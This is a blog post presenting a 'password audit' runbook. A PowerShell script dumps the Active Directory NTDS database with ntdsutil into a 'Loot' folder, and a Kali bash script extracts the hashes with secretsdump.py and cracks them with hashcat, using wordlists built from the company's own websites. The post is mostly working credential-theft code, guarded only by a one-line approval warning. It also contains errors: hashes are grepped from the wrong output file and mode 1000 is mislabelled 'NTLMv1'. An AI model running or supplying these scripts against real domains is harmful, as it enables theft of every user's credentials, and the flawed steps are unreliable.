Notice: Due to size constraints and loading performance considerations, scripts referenced in blog posts are not attached directly. To request access, please complete the following form: Script Request Form Note: A Google account is required to access the form.
Disclaimer: I do not accept responsibility for any issues arising from scripts being run without adequate understanding. It is the user's responsibility to review and assess any code before execution. More information

Scripting : Password Audits (NTDS Extract/Kali Runbook)

byartic6 -
0



This is a partially automated password audition script, obviously, there will be two scripts., the first will be the Windows commands to get the NTDS database from ADDS

Then the second part of the script will need to be run off your Kali Server which will be required to audit the passwords….

Warning : Yes, audit in this scenario is another way of saying crack/hack - which is why should always make sure you have security and HR approval before attempting this.

On the Kali device you will need to ensure you have the following folder structure created:

/opt/ntds_process/
├── input/           # Place ntds.dit and SYSTEM here
├── output/          # Processed results will be saved here
└── process-ntds.sh  # The bash script

When you have successfully completed the windows script, you will need to copy those files to the folder structure /opt/ntds_process/input/

We need to create the script in the correct location as marked above, and then make that script executable with the command:

chmod +x process-ntds.sh

Windows Script - ntdsbackup.ps1

# ====================
# Windows PowerShell Script (extract-ntds.ps1)
# Must be run as Domain Admin/Enterprise Admin
# ====================

$timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupPath = "C:\Loot\AD_backup_$timestamp"

# Create backup directory
New-Item -ItemType Directory -Force -Path $backupPath

# Run ntdsutil commands
$ntdsutilCommands = @"
activate instance ntds
ifm
create full $backupPath
quit
quit
"@
$ntdsutilCommands | ntdsutil.exe
Write-Host "IFM backup created at: $backupPath"
Write-Host "Next steps:"
Write-Host "1. Copy Active Directory database files from $backupPath\Active Directory"
Write-Host "2. Copy registry files from $backupPath\registry"
Write-Host "3. Transfer to Linux machine at /opt/ntds_process/input/"

Kali Script : process-ntds.sh

# ====================
# Linux Bash Script (process-ntds.sh)
# ====================
#!/bin/bash

# Directory Structure
BASE_DIR="/opt/ntds_process"
INPUT_DIR="$BASE_DIR/input"
OUTPUT_DIR="$BASE_DIR/output"
WORDLIST_DIR="$BASE_DIR/wordlists"
RULES_DIR="$BASE_DIR/rules"
TIMESTAMP=$(date +%Y%m%d_%H%M%S)

# Create directories
for dir in "$INPUT_DIR" "$OUTPUT_DIR" "$WORDLIST_DIR" "$RULES_DIR"; do
    mkdir -p "$dir"
done

# Default paths
DEFAULT_WORDLIST="/usr/share/wordlists/rockyou.txt"
DEFAULT_RULES="/usr/share/hashcat/rules/best64.rule"

# Function: Custom wordlist generation
generate_custom_wordlist() {
    echo "Enter target websites for custom wordlist generation (one per line, empty line to finish):"
    echo "Suggested categories:"
    echo "1. Company public websites"
    echo "2. Product documentation"
    echo "3. Public GitHub repositories"
    echo "4. Company blogs"
    echo "5. Press releases"   
    websites=()
    while IFS= read -r line; do
        [[ -z "$line" ]] && break
        websites+=("$line")
    done
    for site in "${websites[@]}"; do
        cewl -d 2 -m 5 --with-numbers "$site" -w "$WORDLIST_DIR/cewl_$(echo $site | sed 's/[^a-zA-Z0-9]/_/g').txt"
    done   

    # Combine and add variations
    cat "$WORDLIST_DIR/cewl_"* > "$WORDLIST_DIR/combined_cewl.txt"
    for suffix in 123 2023 2024; do
        cat "$WORDLIST_DIR/combined_cewl.txt" | sed "s/$/$suffix/" > "$WORDLIST_DIR/with_$suffix.txt"
    done
     cat "$WORDLIST_DIR/with_"* "$DEFAULT_WORDLIST" | sort -u > "$WORDLIST_DIR/final_wordlist.txt"
}

# Function: Generate rule combinations
generate_rules() {
    cat /usr/share/hashcat/rules/best64.rule \
        /usr/share/hashcat/rules/d3ad0ne.rule \
        /usr/share/hashcat/rules/dive.rule \
        > "$RULES_DIR/combined_rules.rule"
}

# Check input files
if [ ! -f "$INPUT_DIR/ntds.dit" ] || [ ! -f "$INPUT_DIR/SYSTEM" ]; then
    echo "Error: Required input files not found in $INPUT_DIR"
    echo "Expected files from Windows IFM backup:"
    echo "- ntds.dit"
    echo "- SYSTEM"
    exit 1
fi

# Main process
echo "Starting NTDS processing..."

# Generate wordlists and rules
generate_custom_wordlist
generate_rules

# Extract hashes
OUTPUT_BASE="$OUTPUT_DIR/hashes_$TIMESTAMP"
secretsdump.py -system "$INPUT_DIR/SYSTEM" -ntds "$INPUT_DIR/ntds.dit" LOCAL -outputfile "$OUTPUT_BASE"
grep -o '[0-9a-f]\{32\}' "${OUTPUT_BASE}.ntds.kerberos" > "${OUTPUT_BASE}.ntlm"

# Crack hashes
hashcat_modes=(1000)  # NTLMv1
for mode in "${hashcat_modes[@]}"; do
    echo "Running hashcat mode $mode..."
    hashcat -m $mode -a 0 "${OUTPUT_BASE}.ntlm" \
        "$WORDLIST_DIR/final_wordlist.txt" \
        -r "$RULES_DIR/combined_rules.rule" \
        --outfile "${OUTPUT_BASE}_mode${mode}.cracked"
done
echo "Processing complete. Check results in $OUTPUT_DIR"

more to add here

Tags
Previous Post Next Post

نموذج الاتصال